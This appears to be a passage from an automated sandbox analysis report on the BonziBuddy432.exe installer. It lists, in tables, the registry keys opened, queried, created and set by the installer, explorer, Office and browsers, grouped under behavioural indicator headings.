| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133633471250679591" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{065E6FDB-1BF9-11D2-BAE8-00104B9E0792}\TypeLib | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A7B93C8B-7B81-11D0-AC5F-00C04FD97575}\TypeLib\Version = "2.0" | C:\Windows\msagent\AgentSvr.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FEB-8583-11D1-B16A-00C0F0283628}\TypeLib | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867A4-8586-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE6-1BF9-11D2-BAE8-00104B9E0792}\ = "SSRibbon Control 3.0" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{065E6FD5-1BF9-11D2-BAE8-00104B9E0792}\TypeLib\ = "{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\MiscStatus\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\InetCtls.Inet\CurVer\ = "InetCtls.Inet.1" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6B1BE80A-567F-11D1-B652-0060976C699F} | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E91E27A3-C5AE-11D2-8D1B-00104B9E072A}\MiscStatus\1 | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D4A-2CDD-11D3-9DD0-D3CD4078982A}\Control | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C8A3DC00-8593-11D1-B16A-00C0F0283628}\ = "IControls" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE6-1BF9-11D2-BAE8-00104B9E0792}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EB61DB30-B032-11D0-A853-0000C02AC6DB}\TypeLib\Version = "2.0" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.acf\ = "Agent.Character.2" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A7B93C8F-7B81-11D0-AC5F-00C04FD97575}\ProxyStubClsid32 | C:\Windows\msagent\AgentSvr.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{972DE6C2-8B09-11D2-B652-A1FD6CC34260}\verb\2\ = "&Save Skin,0,2" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE32-8596-11D1-B16A-00C0F0283628}\ = "TreeView General Property Page Object" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2334D2B1-713E-11CF-8AE5-00AA00C00905}\TypeLib\Version = "2.0" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE9-1BF9-11D2-BAE8-00104B9E0792} | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8F59C2A4-4C01-4451-BE5B-09787B123A5E}\Programmable | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Implemented Categories | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA662-8594-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Threed.SSCheck\CLSID | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{065E6FEA-1BF9-11D2-BAE8-00104B9E0792}\TypeLib\ = "{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E91E27A3-C5AE-11D2-8D1B-00104B9E072A}\InprocServer32\ = "C:\\Program Files (x86)\\BonziBuddy432\\sstabs2.ocx" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4BAC124B-78C8-11D1-B9A8-00C04FD97575}\ = "Agent Custom Proxy Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D47-2CDD-11D3-9DD0-D3CD4078982A}\ = "SkinPanel Class" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6597-857C-11D1-B16A-00C0F0283628}\TypeLib | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EB52CF7C-3917-11CE-80FB-0000C0C14E92}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5BE8BF0-7DE6-11D0-91FE-00C04FD701A5}\TypeLib\Version = "2.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.ComProcTextures.1\ = "ComProcTextures Class" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6597-857C-11D1-B16A-00C0F0283628}\ = "ITabs" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE3-1BF9-11D2-BAE8-00104B9E0792}\InprocServer32\ = "C:\\Program Files (x86)\\BonziBuddy432\\ssa3d30.ocx" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE9-1BF9-11D2-BAE8-00104B9E0792}\Programmable | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00E212A0-E66D-11CD-836C-0000C0C14E92}\TypeLib\ = "{E8671A8B-E5DD-11CD-836C-0000C0C14E92}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
